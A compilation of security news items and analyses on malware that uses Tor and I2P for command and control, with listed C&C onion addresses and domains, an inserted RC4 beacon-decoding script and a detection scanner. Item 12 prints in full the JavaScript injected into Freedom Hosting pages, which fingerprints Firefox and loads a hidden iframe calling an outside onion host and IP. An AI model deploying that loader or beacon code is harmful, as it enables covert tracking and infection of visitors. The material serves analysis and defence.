The Bifrose malware was widely used by cyber criminals. In 2010 a threat actor targeted human resource (HR) personnel of different government offices, including the African Union and NATO.

The Bifrose variant used in the targeted attack on the device manufacturer was able to perform the following operations, as explained in the blog post:

- Download a file
- Upload a file
- Get file details (file size, last modified time)
- Create a folder
- Delete a folder
- Open a file using ShellExecute
- Execute a command line
- Rename a file
- Enumerate all windows and their process IDs
- Close a window
- Move a window to the foreground

OnionDuke: APT Attacks exploited the Tor Network

In November 2014, the experts from F-Secure discovered a link between the crew operating a rogue Tor node used to spread the OnionDuke malware and the MiniDuke APT. Just a month before, the security researcher Josh Pitts of Leviathan Security Group had identified a Russian Tor exit node that was patching the binaries downloaded by users with malware. The expert reported it to officials of the Tor Project, who flagged the Tor exit node as bad and shut it down. Further investigations on the case revealed that the threat actors that managed the node had been serving malware through the described scheme for more than a year.

Figure 7 – OnionDuke infection

The bad actors used the Tor exit node to serve a backdoor, dubbed OnionDuke, to the victim’s machine with a man-in-the-middle attack in the downloading phase. Security experts at F-Secure discovered that the rogue exit node was tied to the MiniDuke criminal crew.
MiniDuke is the name of a sophisticated cyber espionage campaign discovered in 2013 by experts at Kaspersky Lab and Hungary’s Laboratory of Cryptography and System Security (CrySyS). The MiniDuke APT infected dozens of machines at government agencies across Europe. Exploiting a security flaw in Adobe software, the malicious payload is dropped once the victim opens the malicious PDF file. The malware was used by attackers to steal sensitive data from government and high profile entities. The researchers speculated that the level of sophistication and the nature of the chosen targets suggest that the attacks are part of a state-sponsored espionage campaign.

According to the experts, “OnionDuke,” the malware spread through the bogus exit node, is different from the malware used in the past by the threat actors behind the MiniDuke crew. It must be noted that all five domains contacted by OnionDuke aren’t dedicated malicious servers. Instead, they are legitimate websites compromised by the threat actors. The experts identified different samples of the malware and multiple other components of the OnionDuke malware family, which were designed to execute specific tasks like data stealing.

The analysis of the various samples allowed the researchers at F-Secure to discover the link with the MiniDuke gang. The owner of the Command & Control (C&C) server used to control a sample of the OnionDuke backdoor (W32/OnionDuke.A) is the same one that was involved with the MiniDuke agent. This circumstance suggests that although OnionDuke and MiniDuke are two separate strains of malware, the threat actors behind them shared the control infrastructure.

“One component, however, is an interesting exception. This DLL file (SHA1 d433f281cf56015941a1c2cb87066ca62ea1db37, detected as Backdoor:W32/OnionDuke.A) contains among its configuration data a different hardcoded C&C domain, overpict.com and also evidence suggesting that this component may abuse Twitter as an additional C&C channel.
What makes the overpict.com domain interesting, is it was originally registered in 2011 with the alias of ‘John Kasai’. Within a two-week window, ‘John Kasai’ also registered the following domains: airtravelabroad.com, beijingnewsblog.net, grouptumbler.com, leveldelta.com, nasdaqblog.net, natureinhome.com, nestedmail.com, nostressjob.com, nytunion.com, oilnewsblog.com, sixsquare.net and ustradecomp.com. This is significant because the domains leveldelta.com and grouptumbler.com have previously been identified as C&C domains used by MiniDuke,” reports F-Secure in the blog post.

CryptoWall Ransomware is resurrected with new features

In early 2015, the researchers at Cisco’s Talos group published an analysis of a new variant of the CryptoWall ransomware that implements a series of new features, including the exploitation of the Tor anonymity network to hide its command-and-control infrastructure. The new variant of CryptoWall was improved by cyber criminals who applied the necessary modifications to its code to make it resilient to law enforcement operations. Cisco’s Talos Security Intelligence and Research Group reported that the new strain of the CryptoWall ransomware is able to distinguish between 32- and 64-bit architectures and to execute different versions for each architecture and OS, including the newest versions of Mac OS X.

“The latest Cryptowall 2.0, utilizes TOR to obfuscate the command and control channel. The dropper utilizes multiple exploits to gain initial access and incorporates anti-vm and anti-emulation checks to hamper identification via sandboxes. The dropper and downloaded Cryptowall binary actually incorporate multiple levels of encryption. One of the most interesting aspects of this malware sample, however, is its capability to run 64 bit code directly from its 32 bit dropper,” states the report.

The attack chain starts with a phishing mail that includes the CryptoWall variant in a “.zip” attachment.
The compressed archive included an exploit that relies on a Microsoft privilege escalation vulnerability (CVE-2013-3660) to compromise the target machine.

“CryptoWall 2.0 can be delivered through multiple attack vectors, including email attachments, malicious pdf files and even various exploit kits. In the sample that we analyzed, the dropper utilized CVE-2013-3660, ‘Win32k.sys Elevation of Privilege Vulnerability’ to achieve the initial privilege escalation on X86 based machines. This exploit works on 32 bit OSs starting with Vista. The dropper even includes a 64-bit DLL that is able to trigger the exploit in all the vulnerable AMD64 Windows Systems.”

This new variant of CryptoWall also implements an anti-VM and anti-emulation check that prevents execution in a virtualized environment used for malware analysis. CryptoWall implements a multistep decryption. In the first phase, it decrypts just a first portion of code to check if it is running in a virtualized environment. If it passes the check, it then continues to decrypt. According to the Cisco researchers, the feature could be exploited to prevent the execution of the malware by adding fake entries in the file system that indicate a virtual machine is running.

Once it has infected the machine, the sample connects to the Tor servers with an encrypted SSL connection on port 443 or 9090. The C&C servers discovered by the researchers were using the following Tor URLs:

- crptarv4hcu24ijv.onion
- crptbfoi5i54ubez.onion
- crptcj7wd4oaafdl.onion

“Using hardcoded IP address in the PE, the malware connects to the TOR Server with an encrypted SSL connection on port 443 or 9090. After successfully connecting, it starts to generate the Cryptowall domain names using a customized Domain Generation Algorithm (DGA). The algorithm is located at offset + 0x2E9FC.”

Critroni ransomware

Recently a security researcher analyzed a new ransomware dubbed Critroni, which is being sold in different underground forums.
Critroni (aka CTB-Locker) is the name of a new ransomware that has recently been included in the Angler exploit kit. A detailed analysis of the ransomware was posted on “Malware.dontneedcoffee.com” by the French security researcher Kafeine. Critroni implements many functionalities, including the ability to exploit the Tor network to host its command and control.

“Placing a server in onion-domain (TOR), close to domain abuse can not be practically impossible to trace the owner and shut down the server. Connection to the server only after encryption of all files. Early Detection is not possible on the traffic, it is impossible to block the work of the locker. Blocking TOR prevents only payment the user, not the program. Analogs are connected to the server until the crypt and can block,” states the ad for the malware.

The experts explained that the success of the Critroni ransomware was favored by the takedown of GameOver Zeus carried out by law enforcement last year. That botnet was in fact used by cyber criminals to serve the CryptoLocker ransomware. Around the same time in mid-June, security researchers began seeing advertisements for the Critroni ransomware on underground forums. The malware was sold for around $3,000.

The Critroni agent was initially spread exclusively in Russia; later its presence was detected in many other countries worldwide. Many criminal groups are using Critroni for their extortion activities. They used to serve the ransomware as part of the Angler exploit kit, which drops a spambot on victims’ machines. The spambot module is used by the malware authors to drop a couple of other payloads. One of them is Critroni. Critroni encrypts a variety of files on the targeted machine and then displays a dialogue box that demands a payment in Bitcoins in order to decrypt the files.

Figure 8 – Critroni ransomware

Victims have to pay the ransom within 72 hours. If they don’t have any Bitcoins, the ransomware provides detailed instructions on how to acquire them.
I2P botnet: real cases

Not only Tor network – CryptoWall 3.0 uses I2P network

The Tor network isn’t the only anonymizing network exploited by malware authors to hide their malicious infrastructure. In early 2015 a new version of the infamous CryptoWall ransomware was spotted by Microsoft, just a week after Cisco’s Talos Security Intelligence and Research Group announced the discovery of a new strain of the same malware that exploits the Tor network.

The new variant of CryptoWall ransomware, like others, is distributed via malicious email and through malvertising campaigns. This variant was dubbed by the researchers CryptoWall 3.0 or Win32/Crowti, and it isn’t so different from previous instances. However, the experts noted that the names of the files containing the ransom demand have been changed to “HELP_DECRYPT.” This variant customizes files for each infected machine and provides victims a personalized link to a page that contains instructions. The instruction page is still reached through the Tor network.

The victims of CryptoWall 3.0 are given 7 days to pay $500 in Bitcoins if they want to decrypt their documents, but if they don’t pay within 7 days, the ransom increases to $1,000. On January 12, Microsoft identified 288 unique CryptoWall ver. 3.0 infections.

“The graph below shows the spike after two days of no activity from 288 unique machines affected by this malware,” reads the post published by Microsoft.

Figure 9 – Cryptowall ver. 3.0 infections

The French researcher Kafeine, who analyzed CryptoWall 3.0, reported that the communications to the C&C server are encoded with the RC4 cipher. Another feature implemented in the latest variant of the malware is the support of I2P (Invisible Internet Project) for C&C communications.

“It seems communication with the C&C are Rc4 encoded (key seems to be alphanum sorted path of the POST) and using i2p protocol,” said Kafeine.
I2P is another anonymizing network used to hide the location of the control servers and make the botnet’s C&C resilient to law enforcement. Also recently, a new version of the popular black market Silk Road, Silk Road Reloaded, migrated to I2P, probably because at this moment there is the conviction that it is more secure than Tor.

It happens now … new Dyre banking trojan variant

A few days ago, the experts at TrendMicro spotted a new variant of the DYRE/Dyreza banking malware with new propagation and evasion techniques. The malware is spread through malicious emails containing the Upatre downloader disguised as a fax or the details of a package delivery, but once it is executed, the downloader drops the new Dyre variant, which in turn downloads the WORM_MAILSPAM.XDP worm.

The propagation technique implemented by the cyber criminals is very effective. The worm exploits the Microsoft Outlook email client present on the victim’s machine to spread spam emails with the Upatre downloader attached to them. The emails aren’t sent to the victim’s contacts; instead they are sent to email addresses passed by the C&C server. Once the emails are sent by the worm, it deletes itself.

This variant of Dyre uses hard-coded IP addresses for its C&C servers. The malware authors also implemented backup mechanisms for the command and control infrastructure that rely on a URL provided by the malware’s domain generation algorithm (DGA) or a hard-coded address of a C&C server hidden on the Invisible Internet Project (I2P) network.

Figure 10 – Dyre I2P

In this case, the I2P network is used as a supplementary way to control the botnet, a choice made to render it more resilient to attacks.

Conclusion

Security experts believe that malware authors will continue to exploit anonymizing networks like Tor and I2P. Analyzing the timeline of malware detections made by the principal security firms, cyber criminals have been increasing their adoption of such networks since 2012.
Figure 11 – Malware in the Deep Web (Security Affairs)

Malware authors will exploit the Deep Web basically as a backup mechanism for their botnets and to make them more resistant to the various kinds of attacks operated by law enforcement.

References

- Skynet, the potential use of Tor as a bulletproof botnet | Security Affairs
- OnionDuke: APT Attacks exploited the Tor Network | Security Affairs
- New crimekit Atrax exploits Tor, mines Bitcoin and much more | Security Affairs
- Detected 64-bit ZeuS banking trojan using Tor network | Security Affairs
- http://securityaffairs.co/wordpress/27885/cyber-crime/bifrose-uses-tor.html
- http://blogs.cisco.com/security/talos/cryptowall-2
- http://malware.dontneedcoffee.com/2014/07/ctb-locker.html
- http://securityaffairs.co/wordpress/26763/cyber-crime/critroni-ransomware-use-tor.html
- http://securityaffairs.co/wordpress/31993/cyber-crime/cryptowall-ransomware-2-0.html
- http://securityaffairs.co/wordpress/21795/malware/tor-based-chewbacca-infect-pos.html
- https://community.rapid7.com/community/infosec/blog/2012/12/06/skynet-a-tor-powered-botnet-straight-from-reddit
- https://www.defcon.org/images/defcon-18/dc-18-presentations/D.Brown/DEFCON-18-Brown-TorCnC.pdf
- https://blog.gdatasoftware.com/blog/article/botnet-command-server-hidden-in-tor.html
- http://securityaffairs.co/wordpress/13747/cyber-crime/http-botnets-the-dark-side-of-an-standard-protocol.html
- http://contagiodump.blogspot.it/2014/11/onionduke-samples.html?m=1
- http://securelist.com/blog/events/58184/the-inevitable-move-64-bit-zeus-enhanced-with-tor/
- http://securityaffairs.co/wordpress/17601/cyber-crime/botnet-behind-tor-traffic-surge.html

Source: http://resources.infosecinstitute.com/hunting-malware-deep-web/
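Kafeine's note on CryptoWall 3.0 (C&C traffic RC4-encoded, the key apparently being the alphanumeric characters of the POST path, sorted) is the one reproducible detail in the round-up above, and it is the kind of thing an analyst wants as a script rather than as a sentence. The Python below is an added example and is not code from the article, from Kafeine or from any of the cited vendors: the RC4 routine is the standard algorithm, while the key derivation (alphanumerics of the path, sorted, used directly as the key bytes), the sample path and the sample body are assumptions built only from that quoted sentence, not a verified reconstruction of the malware's own routine.

```python
"""RC4 beacon encoding as described for CryptoWall 3.0 (added example; key scheme is an assumption)."""


def rc4_keystream(key: bytes):
    """Standard RC4: key-scheduling (KSA) followed by the pseudo-random generator (PRGA)."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def key_from_path(path: str) -> bytes:
    """ASSUMPTION from Kafeine's note: key = alphanumeric characters of the POST path, sorted.

    Charset, case handling and padding of the real routine are not known from the article."""
    key = "".join(sorted(ch for ch in path if ch.isalnum()))
    if not key:
        raise ValueError("path has no alphanumeric characters, no key can be derived")
    return key.encode("utf-8")


def encode_beacon(path: str, plaintext: bytes) -> str:
    """Bot side: RC4 the report under the path-derived key, hex-encode it for the POST body."""
    return rc4(key_from_path(path), plaintext).hex()


def decode_beacon(path: str, hex_body: str) -> bytes:
    """Analyst side: recover a captured POST body given the path it was sent to."""
    return rc4(key_from_path(path), bytes.fromhex(hex_body))


def looks_decoded(data: bytes) -> bool:
    """Cheap triage check: the right key yields printable text, a wrong one yields noise."""
    return len(data) > 0 and all(32 <= b < 127 or b in (9, 10, 13) for b in data)


# Constructed sample traffic (not real CryptoWall data): a POST to a random-looking PHP path.
SAMPLE_PATH = "/img/gallery/t7y2k.php"
SAMPLE_PLAINTEXT = b"campaign=cw3&victim=0123456789ABCDEF&os=win7x64"

if __name__ == "__main__":
    body = encode_beacon(SAMPLE_PATH, SAMPLE_PLAINTEXT)
    print("derived key :", key_from_path(SAMPLE_PATH))
    print("POST body   :", body)
    print("decoded     :", decode_beacon(SAMPLE_PATH, body))
    # The key is a function of the path, so decoding under another path gives garbage.
    print("wrong path readable?", looks_decoded(decode_beacon("/other.php", body)))
```

The practical direction is the analyst's one: feed a captured POST path and its hex body to decode_beacon() and let looks_decoded() say whether the result is readable, which is a cheap test of whether a sample really follows this scheme. Before trusting any decode, check the RC4 routine against the published test vector (key "Key", plaintext "Plaintext" gives BBF316E8D940AF0AD3).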
7. Section 1: Introduction

1.1 Overview

Lately, a new malware has been seen spreading on Facebook. Facebook is an online social networking service which had over 1.3 billion active users as of June 2014. At that moment, three different variations and spreading methods had been observed. According to the samples that have been acquired, there are three quick campaigns that had been launched. There are some similarities in the way the malware achieves that huge number of infected victims, with a combination of pre-registered domains in the role of C&C server.

1.2 Background

A close friend of mine, who specializes in social media marketing and management, called me late at night requesting my help. He was terrified about the fact that most of his friends on the Facebook platform had been posting statuses with strange links. Having a really strong interest in malware research, I decided with a friend to fully understand the process of infection and spreading.

Read more: http://dl.packetstormsecurity.net/papers/general/facebook_malware.pdf
8. Hackers are using a zero-day vulnerability in Adobe Flash to infect systems with a dangerous BEDEP malware variant.

Trend Micro research engineer Alvin Bacani reported uncovering the campaign in a threat advisory, proving that hackers began targeting the zero-day less than a week after its discovery.

"Continuing our analysis of the recent Adobe zero-day exploit, we find that the infection chain does not end with the Flash exploit, detected as SWF_EXPLOIT.MJST. Rather, the exploit downloads and executes malware belonging to the BEDEP family," read the advisory.

Trend Micro reported uncovering the Flash flaw on 2 February, warning that attackers could target victims with malvertising attacks. The flaw was originally believed to have been targeted by hackers using the Angler Exploit Kit to send malicious automatic pop-up adverts. Bacani explained that BEDEP employs the same malvertising infection tactic, but uses the Hanjuan exploit kit to connect victim machines to a criminal botnet.

"Based on our analysis, the infection chain begins with a site that hosts malvertisements. As the name implies, these are infected online advertisements," read the advisory. "Our recent findings also show that the malware's main purpose is to turn infected systems into botnets for other malicious intentions. Additionally, BEDEP is known for carrying out advertising fraud routines and downloading additional malware."

The full scale of the campaign remains unknown and the nature of the BEDEP malware makes tracking the attacks difficult.

"The fact that the payloads are encoded can be seen as one way of evading detection. An encoded payload will be difficult to identify when passing through the network layer, or when scanned in any layer in an encoded state," noted Bacani. "BEDEP initially came undetected and unnoticed due to its heavy encryption and use of Microsoft file properties for its disguise as well as the use of seemingly legitimate export functions."

The flaw is one of three recently discovered Flash zero-day vulnerabilities. The first two were uncovered by Adobe in January and are known to have been actively targeted by hackers.

Source
9. If someone shares a porn video on Facebook, beware. The latest threat to users involves a fake Flash Player update which pops up during a preview of a pornographic video. Once you click on the link to update your video player, malware (the name given to malicious software) downloads onto your computer. This Trojan horse software gives the creator of the malware remote access to your computer. They can then download viruses onto your computer.

Security researcher Mohammad Faghani alerted users to the threat in a post on the Full Disclosure mailing list, which flags up network vulnerabilities. "The Trojan tags the infected user's friends with an enticing post," he explained. Faghani warned that the malware then tags up to 20 friends of the victim in the malicious post, thus leading to a larger number of those who could be affected. He believes it could "infect more than 110,000 users in two days". Faghani also said the malware was able to hijack keyboard and mouse movement.

In response, Facebook said it was aware of the problem and was working to block it. In a statement issued to security news website Threatpost, a Facebook spokesperson said: "We use a number of automated systems to identify potentially harmful links and stop them from spreading. In this case, we're aware of these malware varieties, which are typically hosted as browser extensions and distributed using links on social media sites. We are blocking links to these scams, offering cleanup options, and pursuing additional measures to ensure that people continue to have a safe experience on Facebook."

Last week, a hacker group called Lizard Squad had hinted it was responsible for Facebook, Instagram and Tinder going down. Facebook denied it was hacked, saying the access issues were "not the result of a third party attack".

Source
10. For many years, different types of malware have ranked among the biggest IT security threats in both the business and the private domain. In order to protect oneself from the dangers of malware, numerous software manufacturers offer IT security products like antivirus and endpoint protection software. But these products alone offer no sufficient protection from malware that knows some tricks, as the results of our recent research on the topic of antivirus evasion show.

In the recent past, several computer-based attacks against IT networks became public and raised a lot of media attention. Especially the attacks against the New York Times [1] and the Washington Post [2] at the beginning of 2013 had world-wide media coverage and also heated the debate about such cyber threats with manufacturers of IT security products like antivirus and endpoint protection software. In both mentioned cases, attackers were able to install malware on computer systems of employees in order to literally spy on the affected companies – and this probably undetected for several months. Once more, incidents like these have pointed out that in spite of the use of IT security products like antivirus software or host intrusion detection/prevention software (HIDS/HIPS) such attacks cannot be entirely prevented. This kind of threat illustrates that enterprises and also government agencies require a master plan with working information security management and security awareness of all employees.

This paper discusses how developers of malware like trojan horses (in short trojans), viruses, and worms proceed to hide their malicious intentions from antivirus software. Thereby, current results of our recent research are presented and recommendations are given for dealing with threats and security risks caused by malware.

How Antivirus Software Works

Current antivirus software, no matter if a standalone software product or a component of a software suite (host intrusion detection/prevention software, endpoint protection software, etc.), uses different methods to detect known and unknown threats by means of malware. In general, these methods used for protecting computer systems from unwanted, malicious software can be assigned to the following two strategies:

1. Blacklisting
2. Whitelisting

In the context of antivirus software, the two terms blacklisting and whitelisting simply mean that the execution of a program is either explicitly forbidden (being on a black list) or explicitly allowed (being on a white list). Thus, by following the blacklisting approach antivirus software will prevent the execution of programs that are

Read more: http://dl.packetstormsecurity.net/papers/general/outsmarted-malware.pdf
11. Researchers have peeled back more layers on Vawtrak, a relatively new banking Trojan so complex that those who have taken it apart have likened it to a Matryoshka, or Russian nesting doll.

Virus Bulletin published a deep dive on the malware penned by Raul Alvarez, a researcher with Fortinet, yesterday. Like a set of dominos, the malware involves a series of steps where each one triggers the next. In this case, the first executable binary triggers the second binary, but before doing so, it needs to decode it by calling a trio of APIs and decrypting a large block of data.

“Vawtrak’s overlay area holds an encrypted copy of the executable binary that is used in the next layer. It is to be transferred and decrypted into the malware’s virtual memory space,” Alvarez writes.

After calling another API, the malware also drops an image file, “Diana-23.jpg,” to con users into thinking that’s the only thing the executable does. After a series of modules are parsed and even more APIs are called upon, the second layer of the malware, the .exe mainOUT-crypted-5, is decrypted and decompressed. By this point, following decompression, the malware has produced what Alvarez refers to as the “third doll” of the malware, an executable binary that’s the simplest of the four layers.

Decrypting the large data block

This part of Vawtrak has no protection at all, meaning no decryption or hashing is used. The third shell of the malware removes software restrictions and tries to restrict any permissions associated with any antimalware apps looking for it. Lastly, the fourth doll in this analogy, if everything has gone according to plan, decrypts data and produces a heap that contains an executable binary, a .DLL disguised as a .DAT file, with a random file name. Once deployed, the malware uses two more APIs, RegCreateKeyA and RegSetValueExW, to ensure the malware sticks around following a restart.

While the malware, which was first written about late last year, was first thought to be targeting banks in Japan, Alvarez claims it’s “recently broadened its geographic scope” and has become more sophisticated over the last several months. “The ingenuity and skills shown by Vawtrak are not simple, but concise,” Alvarez writes in closing.

In September researchers learned that Vawtrak, which was masquerading as Neverquest at the time, had evolved to target social media, retailers and game portals. Recent configurations allowed the malware to sniff out banking sessions, modify data in web traffic, break encryption and steal log-in credentials and other sensitive information.

Source
  12. # MalwareMustDie! # This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. # Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html # Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/ # Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html # Ref: http://www.twitlonger.com/show/n_1rlo0uu # Ref: http://pastebin.com/bu2Ya0n6 # Ref: http://pastebin.com/pmGEj9bV # MalwareMustDie!# This is the malicious Javascript set codes injected to the Freedom Hosting site # It contents the IFRAMER Malware method to redirect the victim to infector site, in url: # http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0 # # Original copy at: www.twitlonger.com/show/n_1rlo0uu # See the Iframer part and tell me if this is NOT adapting malware techniques, and NOT blindly infect every visitor to that site!! # Anyone who accessed an FH site with Firefox & JavaScript enabled must be affected to this IFRAMER. 
# Case: FBI infects malware in public anonymous network http://blog.malwaremustdie.org/2014/08/what-is-bad-stays-bad-legalized-any.html
# Ref: http://www.reddit.com/r/onions/comments/1jmrta/founder_of_the_freedom_hosting_arrested_held/
# Ref: https://www.mozilla.org/security/announce/2013/mfsa2013-53.html
# Ref: http://www.twitlonger.com/show/n_1rlo0uu
# Ref: http://pastebin.com/bu2Ya0n6
# Ref: http://pastebin.com/pmGEj9bV

// Case 1
function createCookie(name,value,minutes) {
  if (minutes) {
    var date = new Date();
    date.setTime(date.getTime()+(minutes*60*1000));
    var expires = "; expires="+date.toGMTString();
  }
  else var expires = "";
  document.cookie = name+"="+value+expires+"; path=/";
}
function readCookie(name) {
  var nameEQ = name + "=";
  var ca = document.cookie.split(';');
  for(var i=0;i < ca.length;i++) {
    var c = ca[i];   // the "[i]" index was eaten by the forum's BBCode in the paste; restored
    while (c.charAt(0)==' ') c = c.substring(1,c.length);
    if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
  }
  return null;
}
function isFF() {
  // Firefox detection: the beacon is only fired from Firefox-based browsers
  return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
function updatify() {
  // near-invisible iframe that loads the callback URL carrying the requestID
  var iframe = document.createElement('iframe');
  iframe.style.display = "inline";
  iframe.frameBorder = "0";
  iframe.scrolling = "no";
  iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0";
  iframe.height = "5";
  iframe.width = "*";
  document.body.appendChild(iframe);
}
function format_quick() {
  // the "n_serv" cookie is a 30-minute marker so the beacon fires once per visitor
  if ( ! readCookie("n_serv") ) {
    createCookie("n_serv", "203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0", 30);
    updatify();
  }
}
function isReady() {
  if ( document.readyState === "interactive" || document.readyState === "complete" ) {
    if ( isFF() ) { format_quick(); }
  } else {
    setTimeout(isReady, 250);
  }
}
setTimeout(isReady, 250);

// Case 2
function createCookie(name, value, minutes) {
  if (minutes) {
    var date = new Date();
    date.setTime(date.getTime() + (minutes * 60 * 1000));
    var expires = "; expires=" + date.toGMTString();
  }
  else var expires = "";
  document.cookie = name + "=" + value + expires + "; path=/";
}
function readCookie(name) {
  var nameEQ = name + "=";
  var ca = document.cookie.split(';');
  for (var i = 0; i < ca.length; i++) {
    var c = ca[i];   // "[i]" restored as in Case 1
    while (c.charAt(0) == ' ') c = c.substring(1, c.length);
    if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
  }
  return null;
}
function isFF() {
  return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}
function updatify() {
  var iframe = document.createElement('iframe');
  iframe.style.display = "inline";
  iframe.frameBorder = "0";
  iframe.scrolling = "no";
  iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66";   // <== (1) 1ST CALLBACK SELF EXPLANATORY
  iframe.height = "5";
  iframe.width = "*";
  document.body.appendChild(iframe);
}
function freedomhost() {
  if (!readCookie("n_serv")) {
    createCookie("n_serv", "eb5f2c80-fc81-11e2-b778-0800200c9a66", 30);
    updatify();
  }
}
function isReady() {
  if (document.readyState === "interactive" || document.readyState === "complete") {
    if (isFF()) {
      //window.alert(window.location + "Firefox Detected.")
      freedomhost();
    }
  } else {
    setTimeout(isReady, 250);
  }
}
setTimeout(isReady, 250);

// Noted, same method,
// second script is w/IP info callback, contacting remote host as per marked (1)

IP Address: 65.222.202.53
City: Triadelphia
State or Region: West Virginia
Country: United States
ISP: Verizon Business
Latitude & Longitude: 40.0900, -80.6220
Domain: verizonbusiness.com
ZIP Code: 26059

---
#MalwareMustDie! @unixfreaxjp
Source
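A triage scanner for loader scripts of the kind shown in this post, added here as an example and not taken from the MalwareMustDie post: it flags script text that combines the Firefox check, the tiny dynamically created iframe and a requestID beacon URL, and reports the beacon for an analyst to pivot on. The two malicious samples are condensed copies of Case 1 and Case 2 above, the benign sample and the trait regexes are my own constructions.

```python
"""Flag Firefox-only beacon loaders like the two scripts in the post above.

Added triage example, not from the MalwareMustDie post. It looks for the
three traits both posted scripts share and flags a script only when all
three are present, returning the beacon URL(s) for further analysis.
"""
import re

# 1. Firefox fingerprinting, the same expressions the posted isFF() uses
FF_FINGERPRINT = re.compile(
    r"mozInnerScreenX|getBoxObjectFor|/Firefox/i\.test\(navigator\.userAgent\)")
# 2. a dynamically created iframe whose height is a one- or two-digit value
HIDDEN_IFRAME = re.compile(
    r"createElement\(\s*[\"']iframe[\"']\s*\)[\s\S]*?\.height\s*=\s*[\"']\d{1,2}[\"']")
# 3. an iframe src carrying a requestID UUID (the per-visitor callback token)
BEACON_URL = re.compile(
    r"\.src\s*=\s*[\"'](https?://[^\"']*?requestID=[0-9a-f-]{36})[\"']", re.I)


def scan_script(js: str) -> dict:
    """Return which traits a script body shows and any beacon URLs found in it."""
    return {
        "firefox_check": bool(FF_FINGERPRINT.search(js)),
        "hidden_iframe": bool(HIDDEN_IFRAME.search(js)),
        "beacons": BEACON_URL.findall(js),
    }


def is_beacon_loader(js: str) -> bool:
    """True only when fingerprinting, a hidden iframe and a beacon all occur."""
    r = scan_script(js)
    return r["firefox_check"] and r["hidden_iframe"] and bool(r["beacons"])


# Constructed samples: Case 1 and Case 2 from the post condensed to the relevant
# functions, plus a benign script that embeds an ordinary full-size iframe.
CASE1 = """function isFF() { return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent)); }
function updatify() { var iframe = document.createElement('iframe'); iframe.style.display = "inline";
iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=203f1a01-6bc7-4c8b-b0be-2726a7a3cbd0"; iframe.height = "5"; iframe.width = "*"; document.body.appendChild(iframe); }"""
CASE2 = """function isFF() { return (/Firefox/i.test(navigator.userAgent)); }
function updatify() { var iframe = document.createElement("iframe");
iframe.src = "http://65.222.202.53/?requestID=eb5f2c80-fc81-11e2-b778-0800200c9a66"; iframe.height = "5"; document.body.appendChild(iframe); }"""
BENIGN = """var f = document.createElement('iframe'); f.src = "https://example.com/widget"; f.height = "300"; document.body.appendChild(f);"""

if __name__ == "__main__":
    for name, js in (("case1", CASE1), ("case2", CASE2), ("benign", BENIGN)):
        print(name, is_beacon_loader(js), scan_script(js)["beacons"])
```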
13. The hacker group behind a notorious campaign targeting a critical vulnerability affecting multiple versions of Microsoft Internet Explorer has altered its strategy to spread malware using social media, according to security firm FireEye.

FireEye senior threat analyst Mike Scott reported in a blog post that the Clandestine Fox hackers altered their attack strategy after Microsoft issued a patch for the IE flaw. Scott said FireEye uncovered the new attack campaign after detecting a number of malicious social network messages targeting its customers.

"The attackers used a combination of direct contact via social networks as well as contact via email, to communicate with their intended targets and send malicious attachments. In addition, in almost all cases, the attackers used the target's personal email address, rather than his or her work address," read the post. "This could be by design, with a view toward circumventing the more comprehensive email security technologies that most companies have deployed, or also due to many people having their social network accounts linked to their personal rather than work email addresses."

FireEye director of technology strategy Jason Steer told V3 that while the Clandestine Fox strikes are only targeting very specific groups, the effectiveness of the tactic means it is only a matter of time before the wider crime community learns from them.

"Sites like Facebook and LinkedIn are prime sites to look for and target people. If you create a fake profile with a throwaway email account you can be anyone you like and if you access it via Tor no one knows where you connect from either and hence hard to trace back. Then you connect with the target," he said. "These types of attacks will be reused and recycled into attacks by other gangs in the cybercrime industry as the effectiveness of their APT-style attacks slows. It will then be used by hacktivists, lone hackers and then by general cyber criminals all looking to use their hack against targets of interest or finally against the general man on the street."

Steer recommended businesses take a variety of precautionary measures to protect themselves from future social media-based hack campaigns. These include deleting suspicious messages and requests from people you don't know without opening them, and using long passwords that are not shared across multiple accounts.

Clandestine Fox is one of many hacker campaigns uncovered in recent months. Crowdstrike reported discovering a Putter Panda hack campaign spying on high-tech firms involved in the space, aerospace and communications industries earlier this week.

Via Clandestine Fox hackers spreading malware via Facebook, Twitter and LinkedIn - IT News from V3.co.uk
14. Data breaches and security incidents are a constant in the headlines these days. Hackers and cyber criminals are motivated by status or money and are finding new, innovative and more creative attacks to achieve this. One of them is digital bank robbery, where the thieves don't need masks and guns to pull off the job; all they need are hacking skills, a computer and the Internet. Another is cyber extortion: the threat of an attack against an enterprise or a bank, coupled with a demand for money to avert or stop the attack.

